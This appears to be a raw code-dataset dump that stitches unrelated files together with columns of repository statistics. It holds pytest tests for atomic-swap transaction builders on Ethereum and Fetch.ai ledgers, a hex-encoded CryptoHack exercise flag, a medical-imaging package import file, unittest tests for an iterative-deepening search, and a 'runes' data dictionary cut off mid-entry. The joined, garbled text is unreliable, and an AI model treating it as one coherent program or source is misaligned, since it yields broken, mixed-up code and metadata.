self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_signature(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if signature is present on Cosmos/Fetch case."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction returns RuntimeError when signature is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_one_pubkey_valid(self):
"""Test if get_atomic_swap_single_transaction allows one pubkey in case of only one direction of transfers."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction works with only to_pubkey
tx = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=1,
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
assert tx is not None
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_one_pubkey_invalid(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing from_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing from_key
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_to_pubkey_missing(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing to_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing from_key
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=1,
trade_nonce=0,
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_eth_pubkeys(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError if pubkeys are present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_batch_transaction returns RuntimeError when pubkey is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_signature(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError if signature is present on Cosmos/Fetch case."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_batch_transaction returns RuntimeError when signature is present
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
signature="signature",
from_pubkey="deadbeef",
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_one_pubkey_valid(self):
"""Test if get_atomic_swap_batch_transaction allows one pubkey in case of only one direction of transfers."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_batch_transaction works with only to_pubkey
tx = self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[0],
to_supplies=[1],
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
assert tx is not None
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_one_pubkey_invalid(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError with missing from_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_batch_transaction fails with missing from_key
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
to_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_ba_transaction_eth_no_signature(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError if signature not present on Ethereum case."""
self.ledger_api.identifier = "ethereum"
# Test if get_atomic_swap_single_transaction returns RuntimeError when signature is missing
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_to_pubkey_missing(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError with missing to_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with all amounts to be zero
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=1,
trade_nonce=0,
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_to_pubkey_missing_no_from_pubkey_required(
self,
):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError with missing to_pubkey and from_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing to_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[0],
to_supplies=[1],
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_from_pubkey_missing_no_to_pubkey_required(
self,
):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError with missing from_pubkey and to_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing from_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=0,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_cosmos_from_pubkey_only(self):
"""Test if get_atomic_swap_batch_transaction returns Tx in case with only from_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction works with only from_pubkey
res = self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[1],
to_supplies=[0],
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
assert res is not None
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_amounts_missing(self):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing amounts."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with all amounts to be zero
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=0,
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_batch_transaction_amounts_missing(self):
"""Test if get_atomic_swap_batch_transaction returns RuntimeError with missing amounts."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with all amounts to be zero
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_batch_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_ids=[self.token_ids_a[0]],
from_supplies=[0],
to_supplies=[0],
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_to_pubkey_missing_no_from_pubkey_required(
self,
):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing to_pubkey and from_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing to_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=0,
to_supply=1,
value=1,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_from_pubkey_missing_no_to_pubkey_required(
self,
):
"""Test if get_atomic_swap_single_transaction returns RuntimeError with missing from_pubkey and to_pubkey not required."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction fails with missing from_pubkey
with pytest.raises(RuntimeError):
self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=0,
trade_nonce=0,
)
@pytest.mark.ledger
def test_get_atomic_swap_single_transaction_cosmos_from_pubkey_only(self):
"""Test if get_atomic_swap_single_transaction returns Tx in case with only from_pubkey."""
self.ledger_api.identifier = "fetchai"
# Test if get_atomic_swap_single_transaction works with only from_pubkey
res = self.contract.get_atomic_swap_single_transaction(
self.ledger_api,
contract_address="address",
from_address="address",
to_address="address",
token_id=self.token_ids_a[0],
from_supply=1,
to_supply=0,
value=0,
trade_nonce=0,
from_pubkey="deadbeef",
)
assert res is not None
| 37.45818
| 130
| 0.619075
| 6,780
| 60,907
| 5.24233
| 0.05118
| 0.046085
| 0.046817
| 0.045916
| 0.864277
| 0.846665
| 0.832119
| 0.825395
| 0.803759
| 0.793433
| 0
| 0.049814
| 0.300934
| 60,907
| 1,625
| 131
| 37.481231
| 0.784959
| 0.147848
| 0
| 0.727929
| 0
| 0
| 0.042251
| 0.002917
| 0
| 0
| 0
| 0
| 0.065811
| 1
| 0.043339
| false
| 0
| 0.009631
| 0
| 0.060995
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38ebf8e80583acc6965a03a1e2012ec42ff74356
| 159
|
py
|
Python
|
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
encoding/hex.py
|
ruarfff/cryptohack
|
9ef672a5e2681104a1f2778982b4b7d60817e33e
|
[
"MIT"
] | null | null | null |
hex_str = '63727970746f7b596f755f77696c6c5f62655f776f726b696e675f776974685f6865785f737472696e67735f615f6c6f747d'
print(bytes.fromhex(hex_str).decode('utf-8'))
| 53
| 112
| 0.886792
| 11
| 159
| 12.636364
| 0.818182
| 0.086331
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.522581
| 0.025157
| 159
| 2
| 113
| 79.5
| 0.374194
| 0
| 0
| 0
| 0
| 0
| 0.660377
| 0.628931
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
ac138986e0ecd1f41f3649d7848bcd4c83562b71
| 153
|
py
|
Python
|
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | 9
|
2021-02-25T23:10:17.000Z
|
2022-02-14T11:48:11.000Z
|
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | null | null | null |
medimodule/Abdomen/models/__init__.py
|
cuchoco/MI2RLNet
|
4ef84e641705df9b10e627c701eb0c9ed924a82a
|
[
"Apache-2.0"
] | 7
|
2021-02-22T12:20:24.000Z
|
2022-03-07T04:56:53.000Z
|
from .liver_seg import LiverSeg
from .polyp_det import PolypDet
from .kidney_tumor_seg import KidneyTumorSeg
from .kidney_tumor_seg import KidneyUtils
| 38.25
| 45
| 0.856209
| 22
| 153
| 5.681818
| 0.545455
| 0.216
| 0.24
| 0.288
| 0.384
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 153
| 4
| 46
| 38.25
| 0.925926
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ac2a32f16e20ad75230ab2d9f8a9248c96c54043
| 8,216
|
py
|
Python
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 2
|
2018-02-20T01:27:25.000Z
|
2018-02-28T10:54:45.000Z
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 1
|
2018-03-01T05:44:43.000Z
|
2018-03-01T05:44:43.000Z
|
iterative_deepening_test.py
|
zhangcshcn/Generic-Iterative-Deepening
|
a03c2b8764a5b113144371a5c285f31d5850c84b
|
[
"MIT"
] | 1
|
2020-10-06T04:42:13.000Z
|
2020-10-06T04:42:13.000Z
|
#! /usr/bin/python2
# -*- coding: utf-8 -*-
import unittest
from iterative_deepening import State, Searchable, IterativeDeepening
class TreeNode(object):
def __init__(self, val=0):
self.val = val
self.left = None
self.right = None
class TreeState(State):
def __init__(self, state, history=None):
super(TreeState, self).__init__(state, history)
class TreeSpace(Searchable):
def __init__(self, root, target=0):
super(TreeSpace, self).__init__(root)
self.target = target
def Neighbors(self, state):
res = []
if state.state.left:
res.append(TreeState(state.state.left))
if state.state.right:
res.append(TreeState(state.state.right))
return res
def Assert(self, state):
return state is not None and state.state.val == self.target
class TreeTest(unittest.TestCase):
def setUp(self):
self.root = TreeNode(0)
queue = [self.root]
for i in xrange(7):
node = queue.pop(0)
node.left = TreeNode(2*i + 1)
node.right = TreeNode(2*i + 2)
queue += [node.left, node.right]
def testBFSErr0(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=8,
max_states_num=16)
sol, err = solver.BFS()
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertSequenceEqual(
[5, 6, 7, 8, 9],
[i.state.val for i in solver.bfs_queue])
self.assertEqual(10, solver.num_states_seen)
def testBFSErr1(self):
target = 17
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=8,
max_states_num=16)
sol, err = solver.BFS()
self.assertEqual(None, sol)
self.assertEqual(1, err)
self.assertSequenceEqual([], [i.state.val for i in solver.bfs_queue])
self.assertEqual(14, solver.num_states_seen)
def testBFSErr2A(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=2,
max_states_num=16)
sol, err = solver.BFS()
self.assertEqual(None, sol)
self.assertEqual(2, err)
self.assertSequenceEqual([1, 2], [i.state.val for i in solver.bfs_queue])
self.assertEqual(2, solver.num_states_seen)
def testBFSErr2B(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=8,
max_states_num=9)
sol, err = solver.BFS()
self.assertEqual(None, sol)
self.assertEqual(2, err)
self.assertSequenceEqual(
[5, 6, 7, 8, 9],
[i.state.val for i in solver.bfs_queue])
self.assertEqual(9, solver.num_states_seen)
def testDFSErr0A(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=8,
max_states_num=16)
sol, err = solver.DFS(tree_space.start_point)
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertEqual(8, solver.num_states_seen)
def testDFSErr0B(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(tree_space)
sol, err = solver.DFS(tree_space.start_point, 3)
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertEqual(8, solver.num_states_seen)
def testDFSErr1A(self):
target = 17
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(tree_space)
sol, err = solver.DFS(tree_space.start_point)
self.assertEqual(None, sol)
self.assertEqual(1, err)
self.assertEqual(14, solver.num_states_seen)
def testDFSErr1B(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(tree_space)
sol, err = solver.DFS(tree_space.start_point, 2)
self.assertEqual(None, sol)
self.assertEqual(1, err)
self.assertEqual(6, solver.num_states_seen)
def testDFSErr2(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space, max_states_num=7)
sol, err = solver.DFS(tree_space.start_point)
self.assertEqual(None, sol)
self.assertEqual(2, err)
self.assertEqual(7, solver.num_states_seen)
def testIterativeDeepeningErr0(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space, max_states_num=10)
sol, err = solver.IterativeDeepening([tree_space.start_point])
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertEqual(10, solver.num_states_seen)
def testIterativeDeepeningErr1(self):
target = 16
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space, max_states_num=16)
sol, err = solver.IterativeDeepening([tree_space.start_point])
self.assertEqual(None, sol)
self.assertEqual(1, err)
self.assertEqual(14, solver.num_states_seen)
def testIterativeDeepeningErr2(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space, max_states_num=9)
sol, err = solver.IterativeDeepening([tree_space.start_point])
self.assertEqual(None, sol)
self.assertEqual(2, err)
self.assertEqual(9, solver.num_states_seen)
def testSearchErr0A(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=3,
max_states_num=16)
sol, err = solver.Search()
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
self.assertEqual(10, solver.num_states_seen)
def testSearchErr0B(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=8,
max_states_num=16)
sol, err = solver.Search()
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertSequenceEqual([5, 6, 7, 8, 9], [i.state.val for i in solver.bfs_queue])
self.assertEqual(10, solver.num_states_seen)
def testSearchErr0C(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=0,
max_states_num=16)
sol, err = solver.Search()
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertSequenceEqual([0], [i.state.val for i in solver.bfs_queue])
self.assertEqual(10, solver.num_states_seen)
def testSearchErr0D(self):
target = 10
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=1,
max_states_num=16)
sol, err = solver.Search()
self.assertEqual(target, sol.state.val)
self.assertEqual(0, err)
self.assertSequenceEqual([0], [i.state.val for i in solver.bfs_queue])
self.assertEqual(10, solver.num_states_seen)
def testSearchErr1(self):
target = 17
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=3,
max_states_num=16)
sol, err = solver.Search()
self.assertEqual(None, sol)
self.assertEqual(1, err)
self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
self.assertEqual(14, solver.num_states_seen)
def testSearchErr2(self):
target = 17
tree_space = TreeSpace(TreeState(self.root), target)
solver = IterativeDeepening(
tree_space,
max_queue_size=3,
max_states_num=9)
sol, err = solver.Search()
self.assertEqual(None, sol)
self.assertEqual(2, err)
self.assertSequenceEqual([2, 3, 4], [i.state.val for i in solver.bfs_queue])
self.assertEqual(9, solver.num_states_seen)
if __name__ == "__main__":
unittest.main()
| 31.358779
| 86
| 0.682084
| 1,073
| 8,216
| 5.055918
| 0.092265
| 0.149309
| 0.108387
| 0.127742
| 0.824332
| 0.801843
| 0.801843
| 0.800922
| 0.791705
| 0.791705
| 0
| 0.027213
| 0.203871
| 8,216
| 261
| 87
| 31.478927
| 0.802171
| 0.004869
| 0
| 0.703057
| 0
| 0
| 0.000979
| 0
| 0
| 0
| 0
| 0
| 0.283843
| 1
| 0.104803
| false
| 0
| 0.008734
| 0.004367
| 0.139738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3bd3c30800bb11b1710e42cecc040ea087e90d92
| 5,654
|
py
|
Python
|
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | 4
|
2019-10-16T07:16:53.000Z
|
2019-12-28T18:28:24.000Z
|
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | null | null | null |
Quantum_Procedural_Generation/runes.py
|
quantumjim/blog
|
bf371b82a8f61b68ee1a503496e4632cac04ce1f
|
[
"Apache-2.0"
] | 1
|
2019-12-09T19:37:06.000Z
|
2019-12-09T19:37:06.000Z
|
runes=[{(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 1, (1, 6): 1, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 1, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 0, (4, 3): 0, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 1, (5, 6): 1, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 1, (2, 5): 1, (2, 6): 0, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 0, (3, 4): 1, (3, 5): 0, (3, 6): 1, (3, 7): 0, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 0, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 1, (5, 3): 0, (5, 4): 1, (5, 5): 0, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 0, (6, 3): 1, (6, 4): 1, (6, 5): 1, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 0, (1, 2): 1, (1, 3): 1, (1, 4): 0, (1, 5): 1, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 1, (2, 3): 0, (2, 4): 1, (2, 5): 0, (2, 6): 0, (2, 7): 1, (3, 0): 0, (3, 1): 0, (3, 2): 0, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 0, (5, 3): 0, (5, 4): 1, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 0, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 0, (1, 2): 1, (1, 3): 1, (1, 4): 0, (1, 5): 1, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 1, (2, 3): 0, (2, 4): 1, (2, 5): 0, (2, 6): 0, (2, 7): 1, (3, 0): 0, (3, 1): 0, (3, 2): 0, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 0, (5, 2): 0, (5, 3): 0, (5, 4): 1, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 0, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 0, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 0, (1, 1): 1, (1, 2): 1, (1, 3): 1, (1, 4): 1, (1, 5): 0, (1, 6): 1, (1, 7): 0, (2, 0): 1, (2, 1): 0, (2, 2): 0, (2, 3): 0, (2, 4): 1, (2, 5): 1, (2, 6): 0, (2, 7): 1, (3, 0): 1, (3, 1): 1, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 1, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 0, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 0, (5, 5): 1, (5, 6): 0, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 0, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 7): 1, (7, 0): 0, (7, 1): 0, (7, 2): 0, (7, 3): 0, (7, 4): 0, (7, 5): 0, (7, 6): 0, (7, 7): 0}, {(0, 0): 0, (0, 1): 0, (0, 2): 0, (0, 3): 0, (0, 4): 0, (0, 5): 0, (0, 6): 0, (0, 7): 0, (1, 0): 1, (1, 1): 1, (1, 2): 1, (1, 3): 0, (1, 4): 1, (1, 5): 1, (1, 6): 0, (1, 7): 1, (2, 0): 1, (2, 1): 1, (2, 2): 0, (2, 3): 1, (2, 4): 0, (2, 5): 0, (2, 6): 1, (2, 7): 1, (3, 0): 1, (3, 1): 0, (3, 2): 1, (3, 3): 1, (3, 4): 1, (3, 5): 1, (3, 6): 1, (3, 7): 1, (4, 0): 0, (4, 1): 1, (4, 2): 1, (4, 3): 1, (4, 4): 1, (4, 5): 1, (4, 6): 1, (4, 7): 1, (5, 0): 1, (5, 1): 1, (5, 2): 1, (5, 3): 1, (5, 4): 1, (5, 5): 1, (5, 6): 1, (5, 7): 1, (6, 0): 1, (6, 1): 1, (6, 2): 1, (6, 3): 1, (6, 4): 1, (6, 5): 0, (6, 6): 1, (6, 